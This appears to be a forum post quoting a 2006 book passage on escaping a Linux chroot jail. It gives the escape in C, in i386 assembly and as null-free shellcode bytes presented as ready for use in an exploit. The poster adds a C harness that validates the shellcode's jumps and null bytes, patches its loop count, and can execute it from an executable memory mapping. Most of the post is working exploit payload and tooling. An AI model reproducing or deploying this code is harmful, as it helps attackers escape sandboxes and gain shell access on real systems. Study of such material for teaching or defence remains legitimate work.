Assembly and Shellcode
Writing Security Tools and Exploits
Syngress Publishing © 2006
A snippet from the book
The following technique breaks out of a chroot jail on the Linux kernels of the time (the book is from 2006), provided the jailed process can call chroot(2) at all: the call requires root, i.e. CAP_SYS_CHROOT. It works by first creating a directory inside the chroot jail and then calling chroot() on that directory. chroot() changes the process's root but not its current directory, so the current directory is now outside the new root. We then iterate 1024 times, attempting to change to the directory ../. On every iteration we stat() the current directory ./, and if that directory has inode number 2 (the root directory's inode on ext2/ext3/ext4; other filesystems number it differently) we have reached the real root of the filesystem: we chroot to ./ one more time and then execute the shell. In C, the code looks like the following:
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    int i;
    struct stat sb;
    mkdir("A", 0755);              /* a directory inside the jail */
    chroot("A");                   /* new root; the cwd stays outside it */
    for (i = 0; i < 1024; i++) {
        chdir("..");               /* climb towards the real root */
        stat(".", &sb);
        if (sb.st_ino == 2) {      /* inode 2: the root directory on ext2/3/4 */
            chroot(".");
            execl("/bin/sh", "sh", (char *)0);  /* shell path assumed; the text only says "the shell" */
        }
    }
}
Converted to Assembly, the code looks like this:
.globl main

main:
    xorl %edx, %edx             # %edx = 0: string terminator and base for the lea trick

    pushl %edx
    pushl $0x2e2e2e2e           # "....\0" on the stack: the directory name

    movl %esp, %ebx             # arg 1: pathname
    movw $0x01ed, %cx           # arg 2: mode 0755 (only the low 16 bits of %ecx are set)

    leal 0x27(%edx), %eax       # __NR_mkdir = 39, loaded without a null byte in the encoding
    int $0x80

    leal 61(%edx), %eax         # __NR_chroot = 61: chroot("....")
    int $0x80

    xorl %esi, %esi             # iteration counter

loop:
    pushl %edx
    pushw $0x2e2e               # "..\0"
    movl %esp, %ebx

    leal 12(%edx), %eax         # __NR_chdir = 12: chdir("..")
    int $0x80

    pushl %edx
    push $0x2e                  # ".\0"
    movl %esp, %ebx             # arg 1: "."

    subl $88, %esp              # room for a struct stat (64 bytes on i386); the stack is never unwound
    movl %esp, %ecx             # arg 2: &sb

    leal 106(%edx), %eax        # __NR_stat = 106: stat(".", &sb)
    int $0x80

    movl 0x4(%ecx), %edi        # sb.st_ino (offset 4 in the i386 struct stat)
    cmpl $0x2, %edi             # root inode of ext2/3/4?
    je hacked

    incl %esi
    cmpl $0x64, %esi            # 100 iterations here, not the 1024 of the C version
    jl loop

hacked:
    pushl %edx
    push $0x2e
    movl %esp, %ebx

    leal 61(%edx), %eax         # chroot(".")
    int $0x80
Lastly, converted to bytecode and ready for use in an exploit, the code looks like the following:
const char neo_chroot[] =
"\x31\xd2"             /* xorl %edx, %edx */
"\x52"                 /* pushl %edx */
"\x68\x2e\x2e\x2e\x2e" /* pushl $0x2e2e2e2e */
"\x89\xe3"             /* movl %esp, %ebx */
"\x66\xb9\xed\x01"     /* movw $0x1ed, %cx */
"\x8d\x42\x27"         /* leal 0x27(%edx), %eax */
"\xcd\x80"             /* int $0x80 */
"\x8d\x42\x3d"         /* leal 0x3d(%edx), %eax */
"\xcd\x80"             /* int $0x80 */
"\x31\xf6"             /* xorl %esi, %esi */
                       /* loop: */
"\x52"                 /* pushl %edx */
"\x66\x68\x2e\x2e"     /* pushw $0x2e2e */
"\x89\xe3"             /* movl %esp, %ebx */
"\x8d\x42\x0c"         /* leal 0xc(%edx), %eax */
"\xcd\x80"             /* int $0x80 */
"\x52"                 /* pushl %edx */
"\x6a\x2e"             /* push $0x2e */
"\x89\xe3"             /* movl %esp, %ebx */
"\x83\xec\x58"         /* subl $0x58, %esp */
"\x89\xe1"             /* movl %esp, %ecx */
"\x8d\x42\x6a"         /* leal 0x6a(%edx), %eax */
"\xcd\x80"             /* int $0x80 */
"\x8b\x79\x04"         /* movl 0x4(%ecx), %edi */
"\x83\xff\x02"         /* cmpl $0x2, %edi */
"\x74\x06"             /* je hacked */
"\x46"                 /* incl %esi */
"\x83\xfe\x64"         /* cmpl $0x64, %esi */
"\x7c\xd7"             /* jl loop */
                       /* hacked: */
"\x52"                 /* pushl %edx */
"\x6a\x2e"             /* push $0x2e */
"\x89\xe3"             /* movl %esp, %ebx */
"\x8d\x42\x3d"         /* leal 0x3d(%edx), %eax */
"\xcd\x80";            /* int $0x80 */
This is the chroot-breaking code converted from C to assembly to bytecode.
When it was written in assembly, care was taken to ensure that no instruction whose encoding contains a null byte was used and that the size was kept to a minimum: a null byte would truncate the payload whenever it is copied by a strcpy()-style routine, and the 77-byte result fits in small buffers.
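As an added example (not code from the book or from the original post), the following C program performs the checks a shellcode author would run on the neo_chroot blob above before using it in an exploit: it confirms that the blob contains no null bytes, that the two hand-encoded relative jumps land exactly on the loop and hacked labels, and it shows why the iteration count in the assembly is 100 rather than the 1024 of the C version (the cmpl with an 8-bit immediate can only encode 1..127; the 32-bit form needed for 1024 carries null bytes). The byte values and label offsets are taken from the listing on this page; the helper names (count_null_bytes, rel8_target, set_loop_count, patched_loop_count) and the --run option are my own. Executing the blob is only meaningful as root in a 32-bit process, and the listing ends after chroot("."), so an execve shellcode has to be appended before running it is useful.

```c
/* Added example, not code from the book: sanity checks for a hand-encoded
 * shellcode blob. Byte values and label offsets come from the neo_chroot
 * listing; function names are this example's own. */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

static const unsigned char neo_chroot[] = {
    0x31, 0xd2,                         /*  0: xorl %edx,%edx               */
    0x52,                               /*  2: pushl %edx  (terminator)     */
    0x68, 0x2e, 0x2e, 0x2e, 0x2e,       /*  3: pushl $"...."                */
    0x89, 0xe3,                         /*  8: movl %esp,%ebx               */
    0x66, 0xb9, 0xed, 0x01,             /* 10: movw $0755,%cx               */
    0x8d, 0x42, 0x27, 0xcd, 0x80,       /* 14: mkdir("....", 0755)          */
    0x8d, 0x42, 0x3d, 0xcd, 0x80,       /* 19: chroot("....")               */
    0x31, 0xf6,                         /* 24: xorl %esi,%esi  (counter)    */
    0x52, 0x66, 0x68, 0x2e, 0x2e,       /* 26: loop: push ".."              */
    0x89, 0xe3, 0x8d, 0x42, 0x0c,       /* 31: chdir("..")                  */
    0xcd, 0x80,
    0x52, 0x6a, 0x2e, 0x89, 0xe3,       /* 38: push "."                     */
    0x83, 0xec, 0x58, 0x89, 0xe1,       /* 43: %ecx = 88-byte struct stat   */
    0x8d, 0x42, 0x6a, 0xcd, 0x80,       /* 48: stat(".", sb)                */
    0x8b, 0x79, 0x04, 0x83, 0xff, 0x02, /* 53: sb.st_ino == 2 ?             */
    0x74, 0x06,                         /* 59: je hacked                    */
    0x46, 0x83, 0xfe, 0x64,             /* 61: incl %esi; cmpl $100,%esi    */
    0x7c, 0xd7,                         /* 65: jl loop                      */
    0x52, 0x6a, 0x2e, 0x89, 0xe3,       /* 67: hacked: push "."             */
    0x8d, 0x42, 0x3d, 0xcd, 0x80        /* 72: chroot(".")                  */
};

/* Label offsets, read off the listing above. */
enum { OFF_LOOP = 26, OFF_JE = 59, OFF_CMP_IMM = 64, OFF_JL = 65, OFF_HACKED = 67 };

size_t neo_chroot_len(void) { return sizeof neo_chroot; }

/* A 0x00 byte would truncate the payload on its way through strcpy()-style code. */
size_t count_null_bytes(const unsigned char *code, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0)
            n++;
    return n;
}

/* Target of a short conditional jump (opcode 0x7x, rel8) at 'off':
 * address of the next instruction plus the sign-extended displacement. */
long rel8_target(const unsigned char *code, size_t off)
{
    return (long)off + 2 + (signed char)code[off + 1];
}

/* Both hand-encoded displacements must land exactly on their labels. */
int branches_ok(const unsigned char *code)
{
    return code[OFF_JE] == 0x74 && rel8_target(code, OFF_JE) == OFF_HACKED
        && code[OFF_JL] == 0x7c && rel8_target(code, OFF_JL) == OFF_LOOP;
}

/* Retarget the iteration count. 'cmpl $imm8,%esi' (83 fe ib) sign-extends its
 * operand, so only 1..127 fit; the C version's 1024 would need the 32-bit form
 * 81 fe 00 04 00 00, which carries null bytes. Returns 0 if n does not fit. */
int set_loop_count(unsigned char *code, int n)
{
    if (code[OFF_CMP_IMM - 2] != 0x83 || code[OFF_CMP_IMM - 1] != 0xfe)
        return 0;
    if (n < 1 || n > 127)
        return 0;
    code[OFF_CMP_IMM] = (unsigned char)n;
    return 1;
}

/* Patch a private copy and report the resulting immediate, or -1 if refused
 * or if the patch introduced a null byte. */
int patched_loop_count(int n)
{
    unsigned char buf[sizeof neo_chroot];
    memcpy(buf, neo_chroot, sizeof buf);
    if (!set_loop_count(buf, n) || count_null_bytes(buf, sizeof buf) != 0)
        return -1;
    return buf[OFF_CMP_IMM];
}

int main(int argc, char **argv)
{
    printf("%zu bytes, %zu null bytes, branches %s\n", neo_chroot_len(),
           count_null_bytes(neo_chroot, neo_chroot_len()),
           branches_ok(neo_chroot) ? "ok" : "BROKEN");
    printf("loop count 1024 -> %d (refused), 50 -> %d\n",
           patched_loop_count(1024), patched_loop_count(50));

    /* "--run" executes the blob from an RWX mapping. Only meaningful as root
     * (chroot(2) needs CAP_SYS_CHROOT) in a 32-bit process, and the blob as
     * listed ends after chroot("."), so append an execve shellcode first. */
    if (argc > 1 && strcmp(argv[1], "--run") == 0) {
        void *mem = mmap(NULL, sizeof neo_chroot, PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (mem == MAP_FAILED)
            return 1;
        memcpy(mem, neo_chroot, sizeof neo_chroot);
        ((void (*)(void))mem)();
    }
    return 0;
}
```

The jump check is the one worth keeping in any shellcode workflow: a displacement that is off by one byte after an edit silently turns the loop into straight-line code, and nothing in the assembler output flags it once the blob has been reduced to a string literal.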
P/S: Any master or guru out there, I need to talk to you; I want to ask you something.
P/S2: I read this book, ~wink and grow rich: one man asked a successful dentist,
"Hello sir, how did you achieve this success? I see you really have a good life;
how did you make it?" Then the dentist answered,
"It's simple: by becoming a better dentist!"..............:wink